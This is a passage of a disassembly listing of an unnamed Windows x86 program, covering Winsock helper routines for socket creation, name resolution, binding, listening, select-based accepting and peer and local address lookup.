pop ecx
cmp [ebp+var_C], 0
jz short loc_4042DA
cmp [ebp+var_C], 0FFFFFFFFh
jz short loc_4042DA
and [ebp+var_18], 0
jmp short loc_4042E1
; ---------------------------------------------------------------------------
loc_4042DA: ; CODE XREF: sub_404279+53�j
; sub_404279+59�j
mov [ebp+var_18], 1
loc_4042E1: ; CODE XREF: sub_404279+5F�j
mov eax, [ebp+var_18]
mov [ebp+var_14], eax
cmp [ebp+var_14], 0
jnz short loc_4042F6
push [ebp+var_C]
call sub_4053B1
pop ecx
loc_4042F6: ; CODE XREF: sub_404279+72�j
mov eax, [ebp+var_14]
locret_4042F9: ; CODE XREF: sub_404279+29�j
leave
retn
sub_404279 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4042FB proc near ; CODE XREF: sub_411D68+4�p
; sub_41349C+1FA�p ...
push ebp
mov ebp, esp
cmp ds:dword_41E364, 0
jnz short loc_404327
call sub_404279
push eax
push offset dword_41E368
call sub_409C9D
pop ecx
pop ecx
push 1
push offset dword_41E364
call sub_409C9D
pop ecx
pop ecx
loc_404327: ; CODE XREF: sub_4042FB+A�j
mov eax, ds:dword_41E368
pop ebp
retn
sub_4042FB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40432E proc near ; CODE XREF: sub_40435B+6�p
; sub_4046BC+5D�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push 0
push 1
push 17h
call ds:dword_417218 ; socket
mov [ebp+var_4], eax
cmp [ebp+var_4], 0FFFFFFFFh
jz short loc_404350
push [ebp+var_4]
call sub_4053B1
pop ecx
loc_404350: ; CODE XREF: sub_40432E+17�j
xor eax, eax
cmp [ebp+var_4], 0FFFFFFFFh
setnz al
leave
retn
sub_40432E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40435B proc near ; CODE XREF: sub_4083AD:loc_4085D6�p
var_18 = dword ptr -18h
var_14 = byte ptr -14h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 18h
call sub_40432E
test eax, eax
jnz short loc_40436E
xor eax, eax
jmp short locret_4043E7
; ---------------------------------------------------------------------------
loc_40436E: ; CODE XREF: sub_40435B+D�j
lea eax, [ebp+var_14]
push eax
call sub_404193
pop ecx
push 1
lea eax, [ebp+var_14]
push eax
call sub_4046BC
pop ecx
pop ecx
mov [ebp+var_C], eax
cmp [ebp+var_C], 0
jnz short loc_404392
xor eax, eax
jmp short locret_4043E7
; ---------------------------------------------------------------------------
loc_404392: ; CODE XREF: sub_40435B+31�j
push 0BB8h
push 2
lea eax, [ebp+var_14]
push eax
push offset dword_418A5C
call sub_4050EA
add esp, 10h
mov [ebp+var_8], eax
push [ebp+var_C]
call sub_404CBB
pop ecx
cmp [ebp+var_8], 0
jz short loc_4043CB
cmp [ebp+var_8], 0FFFFFFFFh
jz short loc_4043CB
mov [ebp+var_18], 1
jmp short loc_4043CF
; ---------------------------------------------------------------------------
loc_4043CB: ; CODE XREF: sub_40435B+5F�j
; sub_40435B+65�j
and [ebp+var_18], 0
loc_4043CF: ; CODE XREF: sub_40435B+6E�j
mov eax, [ebp+var_18]
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jz short loc_4043E4
push [ebp+var_8]
call sub_4053B1
pop ecx
loc_4043E4: ; CODE XREF: sub_40435B+7E�j
mov eax, [ebp+var_4]
locret_4043E7: ; CODE XREF: sub_40435B+11�j
; sub_40435B+35�j
leave
retn
sub_40435B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4043E9 proc near ; CODE XREF: sub_408B30:loc_408C9F�p
; sub_40CA29+231�p ...
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 20h
push offset dword_418A1C
lea eax, [ebp+var_1C]
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
lea eax, [ebp+var_1C]
push eax
call sub_4105FB
pop ecx
push 7D0h
push 2
push offset a80 ; "80"
lea eax, [ebp+var_1C]
push eax
call sub_4050EA
add esp, 10h
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jz short loc_404439
cmp [ebp+var_8], 0FFFFFFFFh
jz short loc_404439
mov [ebp+var_20], 1
jmp short loc_40443D
; ---------------------------------------------------------------------------
loc_404439: ; CODE XREF: sub_4043E9+3F�j
; sub_4043E9+45�j
and [ebp+var_20], 0
loc_40443D: ; CODE XREF: sub_4043E9+4E�j
mov eax, [ebp+var_20]
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jz short loc_404452
push [ebp+var_8]
call sub_4053B1
pop ecx
loc_404452: ; CODE XREF: sub_4043E9+5E�j
mov eax, [ebp+var_4]
leave
retn
sub_4043E9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404457 proc near ; CODE XREF: sub_404FE7+AF�p
; sub_4050EA+ED�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
xor eax, eax
cmp [ebp+arg_4], 0
setz al
mov [ebp+var_4], eax
lea eax, [ebp+var_4]
push eax
push 8004667Eh
push [ebp+arg_0]
call ds:dword_417214 ; ioctlsocket
leave
retn
sub_404457 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40447B proc near ; CODE XREF: sub_40732D+22E�p
; sub_40732D+296�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
lea eax, [ebp+var_4]
push eax
push 4004667Fh
push [ebp+arg_0]
call ds:dword_417214 ; ioctlsocket
xor eax, eax
cmp [ebp+var_4], 0
setnz al
leave
retn
sub_40447B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40449C proc near ; CODE XREF: sub_40D871+5A1�p
; sub_411DC5+65�p
var_84 = dword ptr -84h
var_80 = byte ptr -80h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 84h
mov [ebp+var_84], 80h
lea eax, [ebp+var_84]
push eax
lea eax, [ebp+var_80]
push eax
push [ebp+arg_0]
call ds:dword_417240 ; getsockname
cmp eax, 0FFFFFFFFh
jnz short loc_4044CC
xor eax, eax
jmp short locret_4044F5
; ---------------------------------------------------------------------------
loc_4044CC: ; CODE XREF: sub_40449C+2A�j
push 2
push 0
push 0
push 100h
push [ebp+arg_4]
push [ebp+var_84]
lea eax, [ebp+var_80]
push eax
call ds:dword_41DF58 ; getnameinfo
test eax, eax
jz short loc_4044F2
xor eax, eax
jmp short locret_4044F5
; ---------------------------------------------------------------------------
loc_4044F2: ; CODE XREF: sub_40449C+50�j
push 1
pop eax
locret_4044F5: ; CODE XREF: sub_40449C+2E�j
; sub_40449C+54�j
leave
retn
sub_40449C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4044F7 proc near ; CODE XREF: sub_40732D+DD�p
; sub_4129CA+29�p ...
var_84 = dword ptr -84h
var_80 = byte ptr -80h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 84h
mov [ebp+var_84], 80h
lea eax, [ebp+var_84]
push eax
lea eax, [ebp+var_80]
push eax
push [ebp+arg_0]
call ds:dword_417210 ; getpeername
cmp eax, 0FFFFFFFFh
jnz short loc_404527
xor eax, eax
jmp short locret_404550
; ---------------------------------------------------------------------------
loc_404527: ; CODE XREF: sub_4044F7+2A�j
push 2
push 0
push 0
push 100h
push [ebp+arg_4]
push [ebp+var_84]
lea eax, [ebp+var_80]
push eax
call ds:dword_41DF58 ; getnameinfo
test eax, eax
jz short loc_40454D
xor eax, eax
jmp short locret_404550
; ---------------------------------------------------------------------------
loc_40454D: ; CODE XREF: sub_4044F7+50�j
push 1
pop eax
locret_404550: ; CODE XREF: sub_4044F7+2E�j
; sub_4044F7+54�j
leave
retn
sub_4044F7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404552 proc near ; CODE XREF: sub_41331E+A6�p
; sub_415F69+256�p
var_88 = dword ptr -88h
var_84 = dword ptr -84h
var_80 = byte ptr -80h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 88h
mov [ebp+var_88], 80h
lea eax, [ebp+var_88]
push eax
lea eax, [ebp+var_80]
push eax
push [ebp+arg_0]
call ds:dword_417240 ; getsockname
cmp eax, 0FFFFFFFFh
jnz short loc_404582
xor eax, eax
jmp short locret_4045B0
; ---------------------------------------------------------------------------
loc_404582: ; CODE XREF: sub_404552+2A�j
lea eax, [ebp+var_80]
mov [ebp+var_84], eax
push 0Ah
push [ebp+arg_4]
mov eax, [ebp+var_84]
mov ax, [eax+2]
push eax
call ds:dword_417238 ; ntohs
movzx eax, ax
push eax
call sub_416F7A ; _itoa
add esp, 0Ch
push 1
pop eax
locret_4045B0: ; CODE XREF: sub_404552+2E�j
leave
retn
sub_404552 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4045B2 proc near ; CODE XREF: sub_4143B0+191�p
; sub_415F69+20A�p
var_88 = dword ptr -88h
var_84 = dword ptr -84h
var_80 = byte ptr -80h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 88h
mov [ebp+var_88], 80h
lea eax, [ebp+var_88]
push eax
lea eax, [ebp+var_80]
push eax
push [ebp+arg_0]
call ds:dword_417210 ; getpeername
cmp eax, 0FFFFFFFFh
jnz short loc_4045E2
xor eax, eax
jmp short locret_404610
; ---------------------------------------------------------------------------
loc_4045E2: ; CODE XREF: sub_4045B2+2A�j
lea eax, [ebp+var_80]
mov [ebp+var_84], eax
push 0Ah
push [ebp+arg_4]
mov eax, [ebp+var_84]
mov ax, [eax+2]
push eax
call ds:dword_417238 ; ntohs
movzx eax, ax
push eax
call sub_416F7A ; _itoa
add esp, 0Ch
push 1
pop eax
locret_404610: ; CODE XREF: sub_4045B2+2E�j
leave
retn
sub_4045B2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404612 proc near ; CODE XREF: sub_40D871+69C�p
var_40C = dword ptr -40Ch
var_408 = dword ptr -408h
var_404 = byte ptr -404h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 40Ch
lea eax, [ebp+var_408]
push eax
push 0
push 0
push [ebp+arg_0]
call ds:dword_41DF54 ; getaddrinfo
test eax, eax
jnz loc_4046B8
mov eax, [ebp+var_408]
mov [ebp+var_40C], eax
loc_404643: ; CODE XREF: sub_404612+98�j
cmp [ebp+var_40C], 0
jz short loc_4046AC
push 2
push 0
push 0
push 401h
lea eax, [ebp+var_404]
push eax
mov eax, [ebp+var_40C]
push dword ptr [eax+10h]
mov eax, [ebp+var_40C]
push dword ptr [eax+18h]
call ds:dword_41DF58 ; getnameinfo
test eax, eax
jnz short loc_40469B
mov eax, [ebp+var_40C]
cmp dword ptr [eax+4], 2
jnz short loc_40469B
lea eax, [ebp+var_404]
push eax
push [ebp+arg_4]
call sub_416B3A ; strcpy
pop ecx
pop ecx
mov al, 1
jmp short locret_4046BA
; ---------------------------------------------------------------------------
loc_40469B: ; CODE XREF: sub_404612+66�j
; sub_404612+72�j
mov eax, [ebp+var_40C]
mov eax, [eax+1Ch]
mov [ebp+var_40C], eax
jmp short loc_404643
; ---------------------------------------------------------------------------
loc_4046AC: ; CODE XREF: sub_404612+38�j
push [ebp+var_408]
call ds:dword_41DF5C ; freeaddrinfo
loc_4046B8: ; CODE XREF: sub_404612+1F�j
xor al, al
locret_4046BA: ; CODE XREF: sub_404612+87�j
leave
retn
sub_404612 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4046BC proc near ; CODE XREF: sub_4020C2+124�p
; sub_403DF3+36�p ...
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 3Ch
xor eax, eax
test eax, eax
jz short loc_4046D1
mov [ebp+var_3C], 2
jmp short loc_4046D8
; ---------------------------------------------------------------------------
loc_4046D1: ; CODE XREF: sub_4046BC+A�j
mov [ebp+var_3C], 1
loc_4046D8: ; CODE XREF: sub_4046BC+13�j
mov eax, [ebp+var_3C]
mov [ebp+var_8], eax
push 1008h
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_2C], eax
cmp [ebp+var_2C], 0
jnz short loc_4046F9
xor eax, eax
jmp locret_40486F
; ---------------------------------------------------------------------------
loc_4046F9: ; CODE XREF: sub_4046BC+34�j
mov eax, [ebp+var_2C]
and dword ptr [eax], 0
mov eax, [ebp+var_2C]
and dword ptr [eax+804h], 0
push 20h
push 0
lea eax, [ebp+var_28]
push eax
call sub_416B6A ; memset
add esp, 0Ch
call sub_40432E
neg eax
sbb eax, eax
and al, 0FEh
inc eax
inc eax
mov [ebp+var_24], eax
mov eax, [ebp+var_8]
mov [ebp+var_20], eax
mov [ebp+var_28], 5
lea eax, [ebp+var_30]
push eax
lea eax, [ebp+var_28]
push eax
push [ebp+arg_0]
push 0
call ds:dword_41DF54 ; getaddrinfo
test eax, eax
jz short loc_40475D
push [ebp+var_2C]
call sub_416B4C ; free
pop ecx
xor eax, eax
jmp locret_40486F
; ---------------------------------------------------------------------------
loc_40475D: ; CODE XREF: sub_4046BC+8F�j
mov eax, [ebp+var_30]
mov [ebp+var_4], eax
jmp short loc_40476E
; ---------------------------------------------------------------------------
loc_404765: ; CODE XREF: sub_4046BC+DD�j
; sub_4046BC+F1�j ...
mov eax, [ebp+var_4]
mov eax, [eax+1Ch]
mov [ebp+var_4], eax
loc_40476E: ; CODE XREF: sub_4046BC+A7�j
cmp [ebp+var_4], 0
jz loc_40484E
mov eax, [ebp+var_4]
push dword ptr [eax+0Ch]
mov eax, [ebp+var_4]
push dword ptr [eax+8]
mov eax, [ebp+var_4]
push dword ptr [eax+4]
call ds:dword_417218 ; socket
mov [ebp+var_34], eax
cmp [ebp+var_34], 0FFFFFFFFh
jnz short loc_40479B
jmp short loc_404765
; ---------------------------------------------------------------------------
loc_40479B: ; CODE XREF: sub_4046BC+DB�j
mov eax, [ebp+var_4]
cmp dword ptr [eax+4], 2
jz short loc_4047AF
mov eax, [ebp+var_4]
cmp dword ptr [eax+4], 17h
jz short loc_4047AF
jmp short loc_404765
; ---------------------------------------------------------------------------
loc_4047AF: ; CODE XREF: sub_4046BC+E6�j
; sub_4046BC+EF�j
mov eax, [ebp+arg_4]
and eax, 2
test eax, eax
jz short loc_4047D6
mov [ebp+var_38], 1
push 4
lea eax, [ebp+var_38]
push eax
push 4
push 0FFFFh
push [ebp+var_34]
call ds:dword_417204 ; setsockopt
loc_4047D6: ; CODE XREF: sub_4046BC+FB�j
mov eax, [ebp+var_4]
push dword ptr [eax+10h]
mov eax, [ebp+var_4]
push dword ptr [eax+18h]
push [ebp+var_34]
call ds:dword_417208 ; bind
cmp eax, 0FFFFFFFFh
jnz short loc_4047FE
push [ebp+var_34]
call sub_4053B1
pop ecx
jmp loc_404765
; ---------------------------------------------------------------------------
loc_4047FE: ; CODE XREF: sub_4046BC+132�j
cmp [ebp+var_8], 1
jnz short loc_404822
push 32h
push [ebp+var_34]
call ds:dword_417268 ; listen
cmp eax, 0FFFFFFFFh
jnz short loc_404822
push [ebp+var_34]
call sub_4053B1
pop ecx
jmp loc_404765
; ---------------------------------------------------------------------------
loc_404822: ; CODE XREF: sub_4046BC+146�j
; sub_4046BC+156�j
mov eax, [ebp+var_2C]
mov eax, [eax]
mov ecx, [ebp+var_2C]
mov edx, [ebp+var_34]
mov [ecx+eax*4+4], edx
mov eax, [ebp+var_2C]
mov eax, [eax]
inc eax
mov ecx, [ebp+var_2C]
mov [ecx], eax
mov eax, [ebp+var_2C]
cmp dword ptr [eax], 200h
jnz short loc_404849
jmp short loc_40484E
; ---------------------------------------------------------------------------
loc_404849: ; CODE XREF: sub_4046BC+189�j
jmp loc_404765
; ---------------------------------------------------------------------------
loc_40484E: ; CODE XREF: sub_4046BC+B6�j
; sub_4046BC+18B�j
push [ebp+var_30]
call ds:dword_41DF5C ; freeaddrinfo
mov eax, [ebp+var_2C]
cmp dword ptr [eax], 0
jnz short loc_40486C
push [ebp+var_2C]
call sub_416B4C ; free
pop ecx
xor eax, eax
jmp short locret_40486F
; ---------------------------------------------------------------------------
loc_40486C: ; CODE XREF: sub_4046BC+1A1�j
mov eax, [ebp+var_2C]
locret_40486F: ; CODE XREF: sub_4046BC+38�j
; sub_4046BC+9C�j ...
leave
retn
sub_4046BC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404871 proc near ; CODE XREF: sub_411BBC+B0�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push [ebp+arg_8]
push [ebp+arg_4]
call sub_4046BC
pop ecx
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_40488F
xor eax, eax
jmp short locret_4048ED
; ---------------------------------------------------------------------------
loc_40488F: ; CODE XREF: sub_404871+18�j
mov eax, [ebp+var_4]
mov eax, [eax]
mov ecx, [ebp+arg_0]
add eax, [ecx]
cmp eax, 200h
jbe short loc_4048AD
push [ebp+var_4]
call sub_404CBB
pop ecx
xor eax, eax
jmp short locret_4048ED
; ---------------------------------------------------------------------------
loc_4048AD: ; CODE XREF: sub_404871+2D�j
mov eax, [ebp+var_4]
mov eax, [eax]
shl eax, 2
push eax
mov eax, [ebp+var_4]
add eax, 4
push eax
mov eax, [ebp+arg_0]
mov eax, [eax]
mov ecx, [ebp+arg_0]
lea eax, [ecx+eax*4+4]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, [ebp+arg_0]
mov eax, [eax]
mov ecx, [ebp+var_4]
add eax, [ecx]
mov ecx, [ebp+arg_0]
mov [ecx], eax
push [ebp+var_4]
call sub_416B4C ; free
pop ecx
push 1
pop eax
locret_4048ED: ; CODE XREF: sub_404871+1C�j
; sub_404871+3A�j
leave
retn
sub_404871 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4048EF proc near ; CODE XREF: sub_4020C2+22E�p
; sub_403DF3+8D�p ...
var_A8 = dword ptr -0A8h
var_A4 = dword ptr -0A4h
var_A0 = dword ptr -0A0h
var_9C = dword ptr -9Ch
var_98 = dword ptr -98h
var_94 = dword ptr -94h
var_90 = dword ptr -90h
var_8C = dword ptr -8Ch
var_88 = dword ptr -88h
var_84 = byte ptr -84h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0A8h
push esi
mov [ebp+var_4], 80h
and [ebp+var_8C], 0
jmp short loc_404916
; ---------------------------------------------------------------------------
loc_404909: ; CODE XREF: sub_4048EF+133�j
; sub_4048EF:loc_404A32�j
mov eax, [ebp+var_8C]
inc eax
mov [ebp+var_8C], eax
loc_404916: ; CODE XREF: sub_4048EF+18�j
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_8C]
cmp ecx, [eax]
jnb loc_404A37
mov eax, [ebp+arg_0]
add eax, 804h
push eax
mov eax, [ebp+var_8C]
mov ecx, [ebp+arg_0]
push dword ptr [ecx+eax*4+4]
call sub_416E30 ; __WSAFDIsSet
test eax, eax
jz loc_404A32
loc_40494A: ; CODE XREF: sub_4048EF+100�j
and [ebp+var_9C], 0
jmp short loc_404960
; ---------------------------------------------------------------------------
loc_404953: ; CODE XREF: sub_4048EF:loc_4049E6�j
mov eax, [ebp+var_9C]
inc eax
mov [ebp+var_9C], eax
loc_404960: ; CODE XREF: sub_4048EF+62�j
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_9C]
cmp ecx, [eax+804h]
jnb short loc_4049EB
mov eax, [ebp+var_9C]
mov ecx, [ebp+arg_0]
mov edx, [ebp+var_8C]
mov esi, [ebp+arg_0]
mov eax, [ecx+eax*4+808h]
cmp eax, [esi+edx*4+4]
jnz short loc_4049E6
loc_404990: ; CODE XREF: sub_4048EF+E0�j
mov eax, [ebp+arg_0]
mov eax, [eax+804h]
dec eax
cmp [ebp+var_9C], eax
jnb short loc_4049D1
mov eax, [ebp+var_9C]
mov ecx, [ebp+arg_0]
mov edx, [ebp+var_9C]
mov esi, [ebp+arg_0]
mov edx, [esi+edx*4+80Ch]
mov [ecx+eax*4+808h], edx
mov eax, [ebp+var_9C]
inc eax
mov [ebp+var_9C], eax
jmp short loc_404990
; ---------------------------------------------------------------------------
loc_4049D1: ; CODE XREF: sub_4048EF+B1�j
mov eax, [ebp+arg_0]
mov eax, [eax+804h]
dec eax
mov ecx, [ebp+arg_0]
mov [ecx+804h], eax
jmp short loc_4049EB
; ---------------------------------------------------------------------------
loc_4049E6: ; CODE XREF: sub_4048EF+9F�j
jmp loc_404953
; ---------------------------------------------------------------------------
loc_4049EB: ; CODE XREF: sub_4048EF+80�j
; sub_4048EF+F5�j
xor eax, eax
test eax, eax
jnz loc_40494A
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_84]
push eax
mov eax, [ebp+var_8C]
mov ecx, [ebp+arg_0]
push dword ptr [ecx+eax*4+4]
call ds:dword_4171FC ; accept
mov [ebp+var_98], eax
cmp [ebp+var_98], 0FFFFFFFFh
jnz short loc_404A27
jmp loc_404909
; ---------------------------------------------------------------------------
loc_404A27: ; CODE XREF: sub_4048EF+131�j
mov eax, [ebp+var_98]
jmp loc_404CB8
; ---------------------------------------------------------------------------
loc_404A32: ; CODE XREF: sub_4048EF+55�j
jmp loc_404909
; ---------------------------------------------------------------------------
loc_404A37: ; CODE XREF: sub_4048EF+32�j
mov eax, [ebp+arg_0]
and dword ptr [eax+804h], 0
and [ebp+var_8C], 0
jmp short loc_404A57
; ---------------------------------------------------------------------------
loc_404A4A: ; CODE XREF: sub_4048EF+21D�j
mov eax, [ebp+var_8C]
inc eax
mov [ebp+var_8C], eax
loc_404A57: ; CODE XREF: sub_4048EF+159�j
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_8C]
cmp ecx, [eax]
jnb loc_404B11
loc_404A68: ; CODE XREF: sub_4048EF+217�j
and [ebp+var_A0], 0
jmp short loc_404A7E
; ---------------------------------------------------------------------------
loc_404A71: ; CODE XREF: sub_4048EF:loc_404AB0�j
mov eax, [ebp+var_A0]
inc eax
mov [ebp+var_A0], eax
loc_404A7E: ; CODE XREF: sub_4048EF+180�j
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_A0]
cmp ecx, [eax+804h]
jnb short loc_404AB2
mov eax, [ebp+var_A0]
mov ecx, [ebp+arg_0]
mov edx, [ebp+var_8C]
mov esi, [ebp+arg_0]
mov eax, [ecx+eax*4+808h]
cmp eax, [esi+edx*4+4]
jnz short loc_404AB0
jmp short loc_404AB2
; ---------------------------------------------------------------------------
loc_404AB0: ; CODE XREF: sub_4048EF+1BD�j
jmp short loc_404A71
; ---------------------------------------------------------------------------
loc_404AB2: ; CODE XREF: sub_4048EF+19E�j
; sub_4048EF+1BF�j
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_A0]
cmp ecx, [eax+804h]
jnz short loc_404B02
mov eax, [ebp+arg_0]
cmp dword ptr [eax+804h], 200h
jnb short loc_404B02
mov eax, [ebp+var_A0]
mov ecx, [ebp+arg_0]
mov edx, [ebp+var_8C]
mov esi, [ebp+arg_0]
mov edx, [esi+edx*4+4]
mov [ecx+eax*4+808h], edx
mov eax, [ebp+arg_0]
mov eax, [eax+804h]
inc eax
mov ecx, [ebp+arg_0]
mov [ecx+804h], eax
loc_404B02: ; CODE XREF: sub_4048EF+1D2�j
; sub_4048EF+1E1�j
xor eax, eax
test eax, eax
jnz loc_404A68
jmp loc_404A4A
; ---------------------------------------------------------------------------
loc_404B11: ; CODE XREF: sub_4048EF+173�j
mov eax, [ebp+arg_4]
xor edx, edx
mov ecx, 3E8h
div ecx
mov [ebp+var_94], eax
mov eax, [ebp+arg_4]
xor edx, edx
mov ecx, 3E8h
div ecx
imul edx, 3E8h
mov [ebp+var_90], edx
lea eax, [ebp+var_94]
push eax
push 0
push 0
mov eax, [ebp+arg_0]
add eax, 804h
push eax
mov eax, [ebp+arg_0]
push dword ptr [eax]
call ds:dword_41722C ; select
mov [ebp+var_88], eax
cmp [ebp+var_88], 0
jnz short loc_404B71
or eax, 0FFFFFFFFh
jmp loc_404CB8
; ---------------------------------------------------------------------------
loc_404B71: ; CODE XREF: sub_4048EF+278�j
cmp [ebp+var_88], 0FFFFFFFFh
jnz short loc_404B81
xor eax, eax
jmp loc_404CB8
; ---------------------------------------------------------------------------
loc_404B81: ; CODE XREF: sub_4048EF+289�j
and [ebp+var_8C], 0
jmp short loc_404B97
; ---------------------------------------------------------------------------
loc_404B8A: ; CODE XREF: sub_4048EF+3B4�j
; sub_4048EF:loc_404CB0�j
mov eax, [ebp+var_8C]
inc eax
mov [ebp+var_8C], eax
loc_404B97: ; CODE XREF: sub_4048EF+299�j
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_8C]
cmp ecx, [eax]
jnb loc_404CB5
mov eax, [ebp+arg_0]
add eax, 804h
push eax
mov eax, [ebp+var_8C]
mov ecx, [ebp+arg_0]
push dword ptr [ecx+eax*4+4]
call sub_416E30 ; __WSAFDIsSet
test eax, eax
jz loc_404CB0
loc_404BCB: ; CODE XREF: sub_4048EF+381�j
and [ebp+var_A8], 0
jmp short loc_404BE1
; ---------------------------------------------------------------------------
loc_404BD4: ; CODE XREF: sub_4048EF:loc_404C67�j
mov eax, [ebp+var_A8]
inc eax
mov [ebp+var_A8], eax
loc_404BE1: ; CODE XREF: sub_4048EF+2E3�j
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_A8]
cmp ecx, [eax+804h]
jnb short loc_404C6C
mov eax, [ebp+var_A8]
mov ecx, [ebp+arg_0]
mov edx, [ebp+var_8C]
mov esi, [ebp+arg_0]
mov eax, [ecx+eax*4+808h]
cmp eax, [esi+edx*4+4]
jnz short loc_404C67
loc_404C11: ; CODE XREF: sub_4048EF+361�j
mov eax, [ebp+arg_0]
mov eax, [eax+804h]
dec eax
cmp [ebp+var_A8], eax
jnb short loc_404C52
mov eax, [ebp+var_A8]
mov ecx, [ebp+arg_0]
mov edx, [ebp+var_A8]
mov esi, [ebp+arg_0]
mov edx, [esi+edx*4+80Ch]
mov [ecx+eax*4+808h], edx
mov eax, [ebp+var_A8]
inc eax
mov [ebp+var_A8], eax
jmp short loc_404C11
; ---------------------------------------------------------------------------
loc_404C52: ; CODE XREF: sub_4048EF+332�j
mov eax, [ebp+arg_0]
mov eax, [eax+804h]
dec eax
mov ecx, [ebp+arg_0]
mov [ecx+804h], eax
jmp short loc_404C6C
; ---------------------------------------------------------------------------
loc_404C67: ; CODE XREF: sub_4048EF+320�j
jmp loc_404BD4
; ---------------------------------------------------------------------------
loc_404C6C: ; CODE XREF: sub_4048EF+301�j
; sub_4048EF+376�j
xor eax, eax
test eax, eax
jnz loc_404BCB
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_84]
push eax
mov eax, [ebp+var_8C]
mov ecx, [ebp+arg_0]
push dword ptr [ecx+eax*4+4]
call ds:dword_4171FC ; accept
mov [ebp+var_A4], eax
cmp [ebp+var_A4], 0FFFFFFFFh
jnz short loc_404CA8
jmp loc_404B8A
; ---------------------------------------------------------------------------
loc_404CA8: ; CODE XREF: sub_4048EF+3B2�j
mov eax, [ebp+var_A4]
jmp short loc_404CB8
; ---------------------------------------------------------------------------
loc_404CB0: ; CODE XREF: sub_4048EF+2D6�j
jmp loc_404B8A
; ---------------------------------------------------------------------------
loc_404CB5: ; CODE XREF: sub_4048EF+2B3�j
or eax, 0FFFFFFFFh
loc_404CB8: ; CODE XREF: sub_4048EF+13E�j
; sub_4048EF+27D�j ...
pop esi
leave
retn
sub_4048EF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404CBB proc near ; CODE XREF: sub_4020C2+175�p
; sub_4020C2+25F�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
jmp short loc_404CCC
; ---------------------------------------------------------------------------
loc_404CC5: ; CODE XREF: sub_404CBB+3E�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_404CCC: ; CODE XREF: sub_404CBB+8�j
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_4]
cmp ecx, [eax]
jnb short loc_404CFB
cmp ds:dword_41DF08, 0
jz short loc_404CE9
mov eax, [ebp+arg_0]
cmp dword ptr [eax], 64h
jbe short loc_404CE9
jmp short loc_404CFB
; ---------------------------------------------------------------------------
loc_404CE9: ; CODE XREF: sub_404CBB+22�j
; sub_404CBB+2A�j
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_0]
push dword ptr [ecx+eax*4+4]
call sub_4053B1
pop ecx
jmp short loc_404CC5
; ---------------------------------------------------------------------------
loc_404CFB: ; CODE XREF: sub_404CBB+19�j
; sub_404CBB+2C�j
mov eax, [ebp+arg_0]
and dword ptr [eax+804h], 0
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
leave
retn
sub_404CBB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404D10 proc near ; CODE XREF: sub_41349C+1B7�p
